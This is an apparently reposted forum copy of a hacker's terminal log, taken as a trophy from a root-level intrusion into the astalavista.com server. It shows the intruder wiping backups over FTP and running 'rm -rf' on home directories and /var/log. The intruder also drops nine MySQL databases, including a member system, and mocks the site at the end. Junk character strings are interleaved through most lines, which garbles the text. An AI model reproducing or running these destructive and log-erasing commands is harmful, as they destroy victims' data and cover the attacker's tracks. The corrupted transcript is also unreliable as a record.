-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
O. W2 b1 \7 Z-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar$ J: V1 A! |/ h0 U- Q* q" S( A
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
: Z; [& A( h* K[snip]
+ V5 f- `9 f' d8 x8 y, y226 Transfer complete.# f% Z0 }/ H" \3 D& M, f- @
ftp> mdelete *
6 w1 j0 N6 ]% X+ C7 f2 }% ~ftp> ls -la3 f* t! [* m' O! Y" {/ ?
227 Entering Passive Mode (212,254,194,163,2,193)) S+ ^ M. Y! V4 T2 E2 D) {; R
150 Opening BINARY mode data connection for ‘file list’.
! g$ Q9 z" M! E! A: {) ^2 Z6 o6 ^226 Transfer complete.# \% p5 L4 t1 L4 H- t
ftp>+ \# f2 }1 C" N) c
! c1 d! c3 W/ ^3 E* \3 tsh-3.2# cd /home0 w/ x/ K) h7 `$ g5 A4 Q! |9 E
sh-3.2# ls -la
$ @& q& P& D( K0 m" v! D1 y+ Btotal 120, X/ `! T6 ~- P& V( y; e
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
3 @! W" F* I1 Hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
9 N# ?& ] L1 H5 Q8 B7 O9 X' Zdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin, d# w& t& j. y/ R
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group0 t3 J' P& N0 d& J) x0 D
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user' u3 j9 T( K$ H6 N/ N8 G+ M3 v/ A
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet7 g0 L8 D# ~( P7 g3 [# @
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
# W: h1 M+ `" S: b. \8 Kdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161, M1 }1 ]! J' M y# ~
drwx–x–x 10 com com 4096 Apr 28 12:40 com
) _( {: k @% I+ ]% p- ], \drwxr-xr-x 2 root root 4096 May 17 2007 ftp" a: Q# v/ G6 e; ]( d( N
drwx—— 3 jon jon 4096 Sep 21 2007 jon
& I. ~' @. U' M7 |0 |$ f1 t% b6 qdrwx—— 2 root root 16384 Sep 11 2007 lost+found
; E7 |% ~- I) ?" ]1 t; j% n, Y2 v$ Jdrwxr-xr-x 2 root root 4096 Sep 14 2007 my( m5 M# A7 U y8 F2 ? Y' U
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata$ |. |! q z1 k/ `
drwx—— 2 jon jon 4096 Sep 15 2007 test
% `1 b h% j2 g+ v! Ldrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp3 Z/ T# a& l, b7 t
# \4 M7 N. s3 M- k0 N
sh-3.2# rm -rf backup/
- q: Z4 T) R$ M% tsh-3.2# rm -rf backup.14161/; F1 n, Q2 I8 H( |
sh-3.2# rm -rf ftp/# ~3 u! T- \$ Q! k1 t1 q v4 ~
sh-3.2# rm -rf jon/& `3 q9 [/ h' ^1 L% c* a
sh-3.2# rm -rf my/
* z! q0 W4 k8 b+ A. q9 x* V. ~4 osh-3.2# rm -rf mysqldata/( Y( I, M3 r. C
sh-3.2# rm -rf test/& `+ V2 e. `. w/ ?! N- w6 `0 X2 [
sh-3.2# rm -rf tmp/- _& T% w* n1 U- x1 w6 B* I
sh-3.2# cd ~
+ w, o$ T0 g# r' E" ~# p9 \/ csh-3.2# rm -rf *, u0 a4 c3 r- n) B. L: A _
sh-3.2# rm -rf /var/log/9 S3 i Y$ k; g2 t: K" D) f8 s
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
' C' L/ u" U* \1 _+ i. ` g' bsh-3.2# rm -rf /home/*0 r% W9 y' l- [. g+ v8 R
sh-3.2# mysql+ l5 x( p7 I" s
Welcome to the MySQL monitor. Commands end with ; or \g./ T9 P" ^* @9 X! U
Your MySQL connection id is 407156# H) M( X# O; H% b1 E4 c7 o
Server version: 5.0.45-community-log MySQL Community Edition (GPL); |0 l9 @) x! ], e
2 u8 v& j& Z% a! PType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
* z0 g7 J* Z9 o/ r
, B; N/ u8 p. w* h1 gmysql> show databases;
) ~/ t; h1 k2 A0 ]6 A$ M+———————–+7 } X. q2 {4 n6 Q j
| Database |
4 ?& F* P7 V& F2 x- I+———————–+
( Q+ G% }) V, ^, d( E" q( J* Y/ T| information_schema |
& P1 e6 x3 A, ^7 [' f* \ u| astanet_ads |
3 z* V( X" q w" Q# X" @! x3 }| astanet_mailing_lists |
8 _; c- {3 ` W C7 `: z| astanet_mediawiki |, h- |% Z8 U0 D+ W0 ]% n' s
| astanet_membersystem |
+ s2 y2 J1 _) U% u| com_contrexx |5 G ?2 R% o2 p/ i
| com_contrexx2 |
5 K1 P) \$ B) N| com_contrexx2_live |% e( r+ ]& O2 ]6 F
| da_roundcube |% ~: H. u# T5 j" C @
| dolphin |
: {# Y+ X6 {3 W0 a9 O8 G" l$ F| ideapool |
) ?+ }! B& \" g5 `| mysql |
: l3 H2 _. P" y& c* t| test |% n+ ^3 v: Q* H ^# X+ s% _$ U
| yourmaster |3 P, W% ^3 e! q
+———————–+7 ~6 X" O5 |; Z# N9 T
14 rows in set (0.03 sec) A2 s% S1 i: F* V7 Q
0 U3 j# o+ y1 G; F, _1 E" Fmysql> drop database astanet_membersystem;- ]2 e7 b4 J( M+ U# @% t3 i% i
droQuery OK, 46 rows affected (0.81 sec)
2 y. q5 N0 Q4 |" M+ Z! ]" O7 e p+ C/ p f5 z* V8 c
mysql> drop database com_contrexx;
) g5 f3 o. ^0 q3 ]0 a( nQuery OK, 211 rows affected (2.72 sec)" K5 A3 e2 ]8 f
/ ~8 {' c9 Q- p" k( |' i$ \0 g& q# L' M
mysql> drop database com_contrexx2;
; V0 d6 A) }9 b) V XQuery OK, 237 rows affected (2.23 sec)
& l1 E' e t& t& D8 P7 _3 A5 C* a: u! U# k4 f" r
mysql> drop database com_contrexx2_live;
0 w# k" j7 \/ e" ^) R& j. gQuery OK, 227 rows affected (7.63 sec)
/ c# z7 Z* I* W6 M9 R4 m/ m
* H/ C* e9 s. T- \+ l/ lmysql> drop database ideapool;' `& [; O3 r. K# | m
Query OK, 69 rows affected (0.19 sec). n! `5 K8 p0 H: o) o6 x5 a
$ J+ a( r5 W. ` c
mysql> drop database yourmaster;1 N, l0 ^2 ^6 ]; S% L
Query OK, 158 rows affected (0.55 sec)
$ e! k0 s9 ^7 _% b _& l
K, y: H; v) e; C. m3 X: {* ^8 ymysql> drop database astanet_ads;: x1 [5 k4 F, I7 C3 {2 w
Query OK, 9 rows affected (0.11 sec)2 M/ K* X* l$ f* l: x7 q
7 T" F/ B2 A* [) O+ m) C! _
mysql> drop database astanet_mailing_lists;
o0 y; X/ ?7 K% I. iQuery OK, 24 rows affected (1.47 sec)5 d' X0 o5 B2 X E! E/ }6 x
7 c9 `2 T6 E+ d2 m
mysql> drop database astanet_mediawiki;
# v; b" E/ W3 t4 g( [, MQuery OK, 31 rows affected (0.51 sec)# [# F6 N# s& ~4 ~7 q( S( I
# H1 V/ D5 l# l4 \$ }
mysql> show databases;
6 q4 y, v# T+ z% h+——————–+
$ m2 [/ o3 A2 J0 A0 D; h: C| Database |) w' X5 }/ o6 b
+——————–+) c1 m' p8 `8 I5 l6 c& u( V M
| information_schema |
8 I/ u2 x Y5 c: q! I, Q* C$ \| da_roundcube |; p0 Q7 v- y. y$ P7 J
| dolphin |4 f, ] R* E2 I
| mysql |
3 F+ l# c m6 v0 {7 C% L| test |
# W9 w+ f: `- W e2 H' U+——————–+% u. N% H& y! {
5 rows in set (0.00 sec)$ _) |( z7 l# K- A, ^' _. a
# N. ~ n2 }: ]; |# [% b: s K6 VWhat a journey! We’re not sure exactly why the “Terminator” had any influence on ~2 e8 x4 h6 W
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
# [5 E# _, j) u5 }3 zwrong to say this pack of morons *wont be back*.% R; i& l. y' E. d" C
|
发表于 2012-11-6 21:07:34
收藏
支持
反对